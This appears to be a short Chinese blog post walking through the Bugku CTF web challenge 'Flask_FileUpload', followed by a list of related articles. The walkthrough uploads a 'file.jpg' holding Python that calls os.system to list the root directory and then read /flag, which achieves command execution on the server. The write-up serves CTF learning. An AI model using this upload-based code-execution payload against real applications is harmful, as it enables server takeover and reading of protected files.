技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
独隅
4 分钟前
Python `with` 语句 (上下文管理器) 深度解析与避坑指南
开发语言·python
浮笙若有梦
7 分钟前
我开源了一个比 Ant Design Table 更好用的高性能虚拟表格
前端·vue.js
做怪小疯子
8 分钟前
Python 基础学习
开发语言·python·学习
一只程序熊
12 分钟前
vite-cool-unix-ctx] Unexpected token l in JSON at position 0
java·服务器·前端
Eward-an
22 分钟前
高效构建长度为 n 的开心字符串中第 k 小的字符串
python·leetcode
张元清
25 分钟前
React Hooks vs Vue Composables:2026 年全面对比
前端·javascript·面试
yuki_uix
26 分钟前
从三个自定义 Hook 看 React 状态管理的设计思想
前端·javascript
大漠_w3cpluscom
27 分钟前
如何在 clamp() 中使用 auto 值
前端·css·html
Younglina
30 分钟前
🏸 从零打造一个羽毛球球线追踪网站:纯前端实战指南
前端
Bert.Cai
30 分钟前
Python time.sleep函数作用
开发语言·python
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03OpenClaw 使用和管理 MCP 完全指南04本地部署 OpenClaw + DeepSeek-R1 完全指南05OpenClaw macOS 完整安装与本地模型配置教程(实战版)06OpenClaw 飞书机器人不回复消息?3 小时踩坑总结07UV安装并设置国内源08得物前端部门,没了09Openclow安装保姆级教程10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)